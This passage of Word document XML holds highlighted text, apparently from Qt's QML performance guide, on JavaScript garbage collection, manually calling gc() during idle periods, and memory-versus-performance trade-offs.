      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>garbage</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory which is allocated on the JavaScript heap (as opposed to the C++ heap) is </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>owned by the JavaScript engine</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The engine </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will periodically collect all unreferenced data on the JavaScript heap</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00707484">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1088" w:name="implications-of-garbage-collection"/>
      <w:bookmarkStart w:id="1089" w:name="_Toc483000761"/>
      <w:bookmarkStart w:id="1090" w:name="_Toc483604113"/>
      <w:bookmarkStart w:id="1091" w:name="_Toc483605333"/>
      <w:bookmarkEnd w:id="1088"/>
      <w:r w:rsidRPr="00707484">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implications of Garbage Collection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1089"/>
      <w:bookmarkEnd w:id="1090"/>
      <w:bookmarkEnd w:id="1091"/>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Garbage collection </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has advantages and disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00707484">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manually managing object lifetime is less important</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, it also means that a </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>potentially long-lasting operation may be initiated by the JavaScript engine at a time which is out of the application developer's control</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Unless JavaScript heap usage is considered </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>carefully by the application developer, the frequency and duration of garbage collection may have a negative impact upon the application experience</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00707484">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1092" w:name="manually-invoking-the-garbage-collector"/>
      <w:bookmarkStart w:id="1093" w:name="_Toc483000762"/>
      <w:bookmarkStart w:id="1094" w:name="_Toc483604114"/>
      <w:bookmarkStart w:id="1095" w:name="_Toc483605334"/>
      <w:bookmarkEnd w:id="1092"/>
      <w:r w:rsidRPr="00707484">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manually Invoking the Garbage Collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1093"/>
      <w:bookmarkEnd w:id="1094"/>
      <w:bookmarkEnd w:id="1095"/>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An application written in QML will (most likely) require garbage collection to be performed at some stage. While </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>garbage collection will be automatically triggered by the JavaScript engine when the amount of available free memory is low</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>occasionally better if the application developer makes decisions about when to invoke the garbage collector manually</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (although </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usually this is not the case</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application developer is likely to have the best understanding of when an application is going to be idle for substantial periods of time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If a QML application uses a lot of JavaScript heap memory, causing regular and disruptive garbage collection cycles during particularly performance-sensitive tasks (for example, list scrolling, animations, and so forth), the application developer may be well served to manually invoke the garbage collector during periods of zero activity</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Idle periods are ideal for performing garbage collection since the user will not notice any degradation of user experience (skipped frames, jerky animations, and so on)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which would result from invoking the garbage collector while activity is occurring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The garbage collector may be invoked manually by calling</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gc()</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">within JavaScript. This will cause a </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comprehensive collection cycle to be performed</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which may take </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from between a few hundred to more than a thousand milliseconds to complete</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so should be avoided if at all possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A5BF3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1096" w:name="memory-vs-performance-trade-offs"/>
      <w:bookmarkStart w:id="1097" w:name="_Toc483000763"/>
      <w:bookmarkStart w:id="1098" w:name="_Toc483604115"/>
      <w:bookmarkStart w:id="1099" w:name="_Toc483605335"/>
      <w:bookmarkEnd w:id="1096"/>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memory vs Performance Trade-offs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1097"/>
      <w:bookmarkEnd w:id="1098"/>
      <w:bookmarkEnd w:id="1099"/>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In some situations, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is possible to trade</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-off increased memory usage for decreased processing time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>caching</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the result of a symbol lookup used in a tight loop to a temporary variable in a JavaScript expression will result in a significant performance improvement when evaluating that expression, but it involves allocating a temporary variable. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In some cases, these trade-offs are sensible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as the case above, which is almost always sensible), </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>but in other cases it may be better to allow processing to take slightly longer in order to avoid increasing the memory pressure on the system</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In some cases, the impact of increased memory pressure can be extreme</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In some situations, trading off memory usage for an assumed performance gain </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can result in increased page-thrash or cache-thrash, causing a huge reduction in performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">always </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>necessary to benchmark the impact of trade-offs carefully</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to determine </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which solution is best in a given situation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00D27" w:rsidRDefault="005D1E34" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For in-depth information on </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cache performance and memory-time trade-offs</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, please see Ulrich Drepper's excellent </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>article "What Every Programmer Should Know About Memory"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (available at http://ftp.linux.org.ua/pub/docs/developer/general/cpumemory.pdf as at 18th April 2012), and for information on C++-specific optimizations, please see Agner Fog's excellent </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manuals on optimizing C++ applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (available at http://www.agner.org/op</w:t>
      </w:r>
      <w:r w:rsidR="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timize/ as at 18th April 2012).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00B16AAB" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId674" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B16AAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
